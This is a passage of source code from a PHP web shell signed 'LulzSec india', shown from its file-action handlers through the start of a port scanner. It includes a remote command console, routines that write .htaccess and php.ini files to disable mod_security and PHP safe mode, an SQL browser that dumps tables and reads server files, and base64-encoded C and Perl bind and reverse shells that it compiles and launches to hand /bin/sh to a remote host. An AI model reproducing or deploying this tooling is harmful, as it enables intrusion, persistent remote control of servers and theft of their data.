  2055.             if( !empty($_POST['p3']) ) {
  2056.                 $perms = 0;
  2057.                 for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
  2058.                     $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
  2059.                 if(!@chmod($_POST['p1'], $perms))
  2060.                     echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
  2061.                 else
  2062.                     die('<script>g(null,null,null,null,"")</script>');
  2063.             }
  2064.             echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
  2065.             break;
  2066.         case 'edit':
  2067.             if( !is_writable($_POST['p1'])) {
  2068.                 echo 'File isn\'t writeable';
  2069.                 break;
  2070.             }
  2071.             if( !empty($_POST['p3']) ) {
  2072.                 @file_put_contents($_POST['p1'],$_POST['p3']);
  2073.                 echo 'Saved!<br><script>document.mf.p3.value="";</script>';
  2074.             }
  2075.             echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';
  2076.             $fp = @fopen($_POST['p1'], 'r');
  2077.             if($fp) {
  2078.                 while( !@feof($fp) )
  2079.                     echo htmlspecialchars(@fread($fp, 1024));
  2080.                 @fclose($fp);
  2081.             }
  2082.             echo '</textarea><input type=submit value=">>"></form>';
  2083.             break;
  2084.         case 'hexdump':
  2085.             $c = @file_get_contents($_POST['p1']);
  2086.             $n = 0;
  2087.             $h = array('00000000<br>','','');
  2088.             $len = strlen($c);
  2089.             for ($i=0; $i<$len; ++$i) {
  2090.                 $h[1] .= sprintf('%02X',ord($c[$i])).' ';
  2091.                 switch ( ord($c[$i]) ) {
  2092.                     case 0:  $h[2] .= ' '; break;
  2093.                     case 9:  $h[2] .= ' '; break;
  2094.                     case 10: $h[2] .= ' '; break;
  2095.                     case 13: $h[2] .= ' '; break;
  2096.                     default: $h[2] .= $c[$i]; break;
  2097.                 }
  2098.                 $n++;
  2099.                 if ($n == 32) {
  2100.                     $n = 0;
  2101.                     if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
  2102.                     $h[1] .= '<br>';
  2103.                     $h[2] .= "\n";
  2104.                 }
  2105.              }
  2106.             echo '<table cellspacing=1 cellpadding=5 bgcolor=#000><tr><td bgcolor=#000><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#000><pre>'.$h[1].'</pre></td><td bgcolor=#000><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
  2107.             break;
  2108.         case 'rename':
  2109.             if( !empty($_POST['p3']) ) {
  2110.                 if(!@rename($_POST['p1'], $_POST['p3']))
  2111.                     echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>';
  2112.                 else
  2113.                     die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
  2114.             }
  2115.             echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
  2116.             break;
  2117.         case 'touch':
  2118.             if( !empty($_POST['p3']) ) {
  2119.                 $time = strtotime($_POST['p3']);
  2120.                 if($time) {
  2121.                     if(@touch($_POST['p1'],$time,$time))
  2122.                         die('<script>g(null,null,null,null,"")</script>');
  2123.                     else {
  2124.                         echo 'Fail!<script>document.mf.p3.value="";</script>';
  2125.                     }
  2126.                 } else echo 'Bad time format!<script>document.mf.p3.value="";</script>';
  2127.             }
  2128.             echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
  2129.             break;
  2130.         case 'mkfile':
  2131.             break;
  2132.     }
  2133.     echo '</div>';
  2134.     printFooter();
  2135. }
  2136. function actionConsole() {
  2137.     if(isset($_POST['ajax'])) {
  2138.         $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  2139.         ob_start();
  2140.         echo "document.cf.cmd.value='';\n";
  2141.         $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));
  2142.         if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match))    {
  2143.             if(@chdir($match[1])) {
  2144.                 $GLOBALS['cwd'] = @getcwd();
  2145.                 echo "document.mf.c.value='".$GLOBALS['cwd']."';";
  2146.             }
  2147.         }
  2148.         echo "document.cf.output.value+='".$temp."';";
  2149.         echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
  2150.         $temp = ob_get_clean();
  2151.         echo strlen($temp), "\n", $temp;
  2152.         exit;
  2153.     }
  2154.     printHeader();
  2155. echo '<script>
  2156. if(window.Event) window.captureEvents(Event.KEYDOWN);
  2157. var cmds = new Array("");
  2158. var cur = 0;
  2159. function kp(e) {
  2160.     var n = (window.Event) ? e.which : e.keyCode;
  2161.     if(n == 38) {
  2162.         cur--;
  2163.         if(cur>=0)
  2164.             document.cf.cmd.value = cmds[cur];
  2165.         else
  2166.             cur++;
  2167.     } else if(n == 40) {
  2168.         cur++;
  2169.         if(cur < cmds.length)
  2170.             document.cf.cmd.value = cmds[cur];
  2171.         else
  2172.             cur--;
  2173.     }
  2174. }
  2175. function add(cmd) {
  2176.     cmds.pop();
  2177.     cmds.push(cmd);
  2178.     cmds.push("");
  2179.     cur = cmds.length-1;
  2180. }
  2181. </script>';
  2182.     echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>';
  2183.     foreach($GLOBALS['aliases'] as $n => $v) {
  2184.         if($v == '') {
  2185.             echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
  2186.             continue;
  2187.         }
  2188.         echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
  2189.     }
  2190.     if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  2191.         $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  2192.     echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;" readonly>';
  2193.     if(!empty($_POST['p1'])) {
  2194.         echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
  2195.     }
  2196.     echo '</textarea><input type=text name=cmd style="border-top:0;width:100%;" onkeydown="kp(event);">';
  2197.     echo '</form></div><script>document.cf.cmd.focus();</script>';
  2198.     printFooter();
  2199. }
  2200. function actionLogout() {
  2201.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  2202.     echo '<body bgcolor=#000000><center><img src="http://images.all-free-download.com/images/graphiclarge/abstract_indian_shiny_flag_black_tricolor_wave_6818267.jpg"><h1><font color="gray"> BYE BHAI <br><h2><font size="4">SHELL BY Mr. Po Panda  <p><h2> LulzSec india <br><h2><font color="gray">HINDUSTAN<font color="#fff">ZINDABAD</h2><p><font color="BLUE" font size="4">WE ARE :<marquee width="80%"> LulzSec india </marquee></font></font></font></center></body>';
  2203. }
  2204.  
  2205. function actionBypass() {
  2206.     printHeader();
  2207.     echo '<h1>Safe Mode</h1>';
  2208.     echo '<div class="content">';
  2209.     echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh  ] files create in following dir<br>| ".$GLOBALS['cwd']." |<br><br />";
  2210.     echo '<a href=# onclick="g(null,null,\'php.ini\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\'ini\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\'sh\')">| .htaccess(perl) | </a></center>';
  2211.     if(!empty($_POST['p2']) && isset($_POST['p2']))
  2212.     {
  2213.         $fil=fopen($GLOBALS['cwd'].".htaccess","w");
  2214.         fwrite($fil,'<IfModule mod_security.c>
  2215.             Sec------Engine Off
  2216.             Sec------ScanPOST Off
  2217.             </IfModule>');
  2218.         fclose($fil);
  2219.    }
  2220.    if(!empty($_POST['p1'])&& isset($_POST['p1']))
  2221.    {
  2222.         $fil=fopen($GLOBALS['cwd']."php.ini","w");
  2223.         fwrite($fil,'safe_mode=OFF
  2224.             disable_functions=NONE');
  2225.         fclose($fil);
  2226.     }
  2227.     if(!empty($_POST['p3']) && isset($_POST['p3']))
  2228.     {
  2229.         $fil=fopen($GLOBALS['cwd'].".htaccess","w");
  2230.         fwrite($fil,'Options FollowSymLinks MultiViews Indexes ExecCGI
  2231.         AddType application/x-httpd-cgi .sh
  2232.         AddHandler cgi-script .pl
  2233.         AddHandler cgi-script .pl');
  2234.         fclose($fil);
  2235.     }
  2236.     echo "<br><br /><br /></div>";
  2237.     echo '</div>';
  2238.     printFooter();
  2239. }
  2240.  
  2241. function actionSql() {
  2242.     class DbClass {
  2243.         var $type;
  2244.         var $link;
  2245.         var $res;
  2246.         function DbClass($type)    {
  2247.             $this->type = $type;
  2248.         }
  2249.         function connect($host, $user, $pass, $dbname){
  2250.             switch($this->type)    {
  2251.                 case 'mysql':
  2252.                     if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
  2253.                     break;
  2254.                 case 'pgsql':
  2255.                     $host = explode(':', $host);
  2256.                     if(!$host[1]) $host[1]=5432;
  2257.                     if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
  2258.                     break;
  2259.             }
  2260.             return false;
  2261.         }
  2262.         function selectdb($db) {
  2263.             switch($this->type)    {
  2264.                 case 'mysql':
  2265.                     if (@mysql_select_db($db))return true;
  2266.                     break;
  2267.             }
  2268.             return false;
  2269.         }
  2270.         function query($str) {
  2271.             switch($this->type) {
  2272.                 case 'mysql':
  2273.                     return $this->res = @mysql_query($str);
  2274.                     break;
  2275.                 case 'pgsql':
  2276.                     return $this->res = @pg_query($this->link,$str);
  2277.                     break;
  2278.             }
  2279.             return false;
  2280.         }
  2281.         function fetch() {
  2282.             $res = func_num_args()?func_get_arg(0):$this->res;
  2283.             switch($this->type)    {
  2284.                 case 'mysql':
  2285.                     return @mysql_fetch_assoc($res);
  2286.                     break;
  2287.                 case 'pgsql':
  2288.                     return @pg_fetch_assoc($res);
  2289.                     break;
  2290.             }
  2291.             return false;
  2292.         }
  2293.         function listDbs() {
  2294.             switch($this->type)    {
  2295.                 case 'mysql':
  2296.                     return $this->res = @mysql_list_dbs($this->link);
  2297.                 break;
  2298.                 case 'pgsql':
  2299.                     return $this->res = $this->query("SELECT datname FROM pg_database");
  2300.                 break;
  2301.             }
  2302.             return false;
  2303.         }
  2304.         function listTables() {
  2305.             switch($this->type)    {
  2306.                 case 'mysql':
  2307.                     return $this->res = $this->query('SHOW TABLES');
  2308.                 break;
  2309.                 case 'pgsql':
  2310.                     return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'");
  2311.                 break;
  2312.             }
  2313.             return false;
  2314.         }
  2315.         function error() {
  2316.             switch($this->type)    {
  2317.                 case 'mysql':
  2318.                     return @mysql_error($this->link);
  2319.                 break;
  2320.                 case 'pgsql':
  2321.                     return @pg_last_error($this->link);
  2322.                 break;
  2323.             }
  2324.             return false;
  2325.         }
  2326.         function setCharset($str) {
  2327.             switch($this->type)    {
  2328.                 case 'mysql':
  2329.                     if(function_exists('mysql_set_charset'))
  2330.                         return @mysql_set_charset($str, $this->link);
  2331.                     else
  2332.                         $this->query('SET CHARSET '.$str);
  2333.                     break;
  2334.                 case 'mysql':
  2335.                     return @pg_set_client_encoding($this->link, $str);
  2336.                     break;
  2337.             }
  2338.             return false;
  2339.         }
  2340.         function dump($table) {
  2341.             switch($this->type)    {
  2342.                 case 'mysql':
  2343.                     $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
  2344.                     $create = mysql_fetch_array($res);
  2345.                     echo $create[1].";\n\n";
  2346.                     $this->query('SELECT * FROM `'.$table.'`');
  2347.                     while($item = $this->fetch()) {
  2348.                         $columns = array();
  2349.                         foreach($item as $k=>$v) {
  2350.                             $item[$k] = "'".@mysql_real_escape_string($v)."'";
  2351.                             $columns[] = "`".$k."`";
  2352.                         }
  2353.                     echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
  2354.                     }
  2355.                 break;
  2356.                 case 'pgsql':
  2357.                     $this->query('SELECT * FROM '.$table);
  2358.                     while($item = $this->fetch()) {
  2359.                         $columns = array();
  2360.                         foreach($item as $k=>$v) {
  2361.                             $item[$k] = "'".addslashes($v)."'";
  2362.                             $columns[] = $k;
  2363.                         }
  2364.                     echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
  2365.                     }
  2366.                 break;
  2367.             }
  2368.             return false;
  2369.         }
  2370.     };
  2371.     $db = new DbClass(@$_POST['type']);
  2372.     if(@$_POST['p2']=='download') {
  2373.         ob_start("ob_gzhandler", 4096);
  2374.         $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
  2375.         $db->selectdb($_POST['sql_base']);
  2376.         header("Content-Disposition: attachment; filename=dump.sql");
  2377.         header("Content-Type: text/plain");
  2378.         foreach($_POST['tbl'] as $v)
  2379.                 $db->dump($v);
  2380.         exit;
  2381.     }
  2382.     printHeader();
  2383.     echo '<h1>Sql browser</h1><div class=content>
  2384.     <form name="sf" method="post">
  2385.         <table cellpadding="2" cellspacing="0">
  2386.             <tr>
  2387.                 <td>Type</td>
  2388.                 <td>Host</td>
  2389.                 <td>Login</td>
  2390.                 <td>Password</td>
  2391.                 <td>Database</td>
  2392.                 <td></td>
  2393.             </tr>
  2394.             <tr>
  2395.                 <input type=hidden name=a value=Sql>
  2396.                 <input type=hidden name=p1 value=\'query\'>
  2397.                 <input type=hidden name=p2>
  2398.                 <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
  2399.                 <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  2400.                 <td>
  2401.                     <select name=\'type\'>
  2402.                         <option value="mysql" '.(@$_POST['type']=='mysql'?'selected':'').'>MySql</option>
  2403.                         <option value="pgsql" '.(@$_POST['type']=='pgsql'?'selected':'').'>PostgreSql</option>
  2404.                     </select></td>
  2405.                 <td><input type=text name=sql_host value="'.(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])).'"></td>
  2406.                 <td><input type=text name=sql_login value="'.(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])).'"></td>
  2407.                 <td><input type=text name=sql_pass value="'.(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])).'"></td>
  2408.                 <td>';
  2409.     $tmp = "<input type=text name=sql_base value=''>";
  2410.     if(isset($_POST['sql_host'])){
  2411.         if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
  2412.             switch($_POST['charset']) {
  2413.                 case "Windows-1251": $db->setCharset('cp1251'); break;
  2414.                 case "UTF-8": $db->setCharset('utf8'); break;
  2415.                 case "KOI8-R": $db->setCharset('koi8r'); break;
  2416.                 case "KOI8-U": $db->setCharset('koi8u'); break;
  2417.                 case "cp866": $db->setCharset('cp866'); break;
  2418.             }
  2419.             $db->listDbs();
  2420.             echo "<select name=sql_base><option value=''></option>";
  2421.             while($item = $db->fetch()) {
  2422.                 list($key, $value) = each($item);
  2423.                 echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
  2424.             }
  2425.             echo '</select>';
  2426.         }
  2427.         else echo $tmp;
  2428.     }else
  2429.         echo $tmp;
  2430.     echo '</td>
  2431.                 <td><input type=submit value=">>"></td>
  2432.             </tr>
  2433.         </table>
  2434.         <script>
  2435.             function st(t,l) {
  2436.                 document.sf.p1.value = \'select\';
  2437.                 document.sf.p2.value = t;
  2438.                 if(l!=null)document.sf.p3.value = l;
  2439.                 document.sf.submit();
  2440.             }
  2441.             function is() {
  2442.                 for(i=0;i<document.sf.elements[\'tbl[]\'].length;++i)
  2443.                     document.sf.elements[\'tbl[]\'][i].checked = !document.sf.elements[\'tbl[]\'][i].checked;
  2444.             }
  2445.         </script>';
  2446.     if(isset($db) && $db->link){
  2447.         echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
  2448.             if(!empty($_POST['sql_base'])){
  2449.                 $db->selectdb($_POST['sql_base']);
  2450.                 echo "<tr><td width=1 style='border-top:1px  #56A3E9;border-right:2px  #56A3E9;'><span>Tables:</span><br><br>";
  2451.                 $tbls_res = $db->listTables();
  2452.                 while($item = $db->fetch($tbls_res)) {
  2453.                     list($key, $value) = each($item);
  2454.                     $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
  2455.                     $value = htmlspecialchars($value);
  2456.                     echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr><br>";
  2457.                 }
  2458.                 echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:1px  #56A3E9;'>";
  2459.                 if(@$_POST['p1'] == 'select') {
  2460.                     $_POST['p1'] = 'query';
  2461.                     $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].'');
  2462.                     $num = $db->fetch();
  2463.                     $num = $num['n'];
  2464.                     echo "<span>".$_POST['p2']."</span> ($num) ";
  2465.                     for($i=0;$i<($num/30);$i++)
  2466.                         if($i != (int)$_POST['p3'])
  2467.                             echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i+1),"</a> ";
  2468.                         else
  2469.                             echo ($i+1)," ";
  2470.                     if($_POST['type']=='pgsql')
  2471.                         $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
  2472.                     else
  2473.                         $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
  2474.                     echo "<br><br>";
  2475.                 }
  2476.                 if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) {
  2477.                     $db->query(@$_POST['p3']);
  2478.                     if($db->res !== false) {
  2479.                         $title = false;
  2480.                         echo '<table width=100% cellspacing=0 cellpadding=2 class=main>';
  2481.                         $line = 1;
  2482.                         while($item = $db->fetch())    {
  2483.                             if(!$title)    {
  2484.                                 echo '<tr>';
  2485.                                 foreach($item as $key => $value)
  2486.                                     echo '<th>'.$key.'</th>';
  2487.                                 reset($item);
  2488.                                 $title=true;
  2489.                                 echo '</tr><tr>';
  2490.                                 $line = 2;
  2491.                             }
  2492.                             echo '<tr class="l'.$line.'">';
  2493.                             $line = $line==1?2:1;
  2494.                             foreach($item as $key => $value) {
  2495.                                 if($value == null)
  2496.                                     echo '<td><i>null</i></td>';
  2497.                                 else
  2498.                                     echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
  2499.                             }
  2500.                             echo '</tr>';
  2501.                         }
  2502.                         echo '</table>';
  2503.                     } else {
  2504.                         echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
  2505.                     }
  2506.                 }
  2507.                 echo "<br><textarea name='p3' style='width:100%;height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>";
  2508.                 echo "</td></tr>";
  2509.             }
  2510.             echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
  2511.             if(@$_POST['p1'] == 'loadfile') {
  2512.                 $db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file");
  2513.                 $file = $db->fetch();
  2514.                 echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
  2515.             }
  2516.     }
  2517.     echo '</div>';
  2518.     printFooter();
  2519. }
  2520. function actionNetwork() {
  2521.     printHeader();
  2522.     $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
  2523.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  2524.     $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
  2525.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  2526.     echo '<h1>Network tools</h1><div class=content>
  2527.     <form name=\'nfp\' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;">
  2528.     <br /><span>Bind port to /bin/sh</span><br/>
  2529.     Port: <input type=\'text\' name=\'port\' value=\'444\'> Password: <input type=\'text\' name=\'pass\' value=\'BHP\'> Using: <select name="using"><option value=\'bpc\'>C</option><option value=\'bpp\'>Perl</option></select> <input type=submit value=">>">
  2530.     </form>
  2531.     <form name=\'nfp\' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;">
  2532.     <br /><br /><span>Back-connect to</span><br/>
  2533.     Server: <input type=\'text\' name=\'server\' value="'.$_SERVER['REMOTE_ADDR'].'"> Port: <input type=\'text\' name=\'port\' value=\'444\'> Using: <select name="using"><option value=\'bcc\'>C</option><option value=\'bcp\'>Perl</option></select> <input type=submit value=">>">
  2534.     </form><br>';    
  2535.     if(isset($_POST['p1'])) {
  2536.         function cf($f,$t) {
  2537.             $w=@fopen($f,"w") or @function_exists('file_put_contents');
  2538.             if($w)    {
  2539.                 @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
  2540.                 @fclose($w);
  2541.             }
  2542.         }
  2543.         if($_POST['p1'] == 'bpc') {
  2544.             cf("/tmp/bp.c",$bind_port_c);
  2545.             $out = ex("gcc -o /tmp/bp /tmp/bp.c");
  2546.             @unlink("/tmp/bp.c");
  2547.             $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
  2548.             echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>";
  2549.         }
  2550.         if($_POST['p1'] == 'bpp') {
  2551.             cf("/tmp/bp.pl",$bind_port_p);
  2552.             $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
  2553.             echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>";
  2554.         }
  2555.         if($_POST['p1'] == 'bcc') {
  2556.             cf("/tmp/bc.c",$back_connect_c);
  2557.             $out = ex("gcc -o /tmp/bc /tmp/bc.c");
  2558.             @unlink("/tmp/bc.c");
  2559.             $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
  2560.             echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>";
  2561.         }
  2562.         if($_POST['p1'] == 'bcp') {
  2563.             cf("/tmp/bc.pl",$back_connect_p);
  2564.             $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
  2565.             echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>";
  2566.         }
  2567.     }
  2568.     echo '</div>';
  2569.     printFooter();
  2570. }
  2571. function actionPortScanner() {
  2572.     printHeader();
  2573.     echo '<h1>Port Scanner</h1>';
  2574.     echo '<div class="content">';
  2575.     echo '<form action="" method="post">';
  2576.     if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
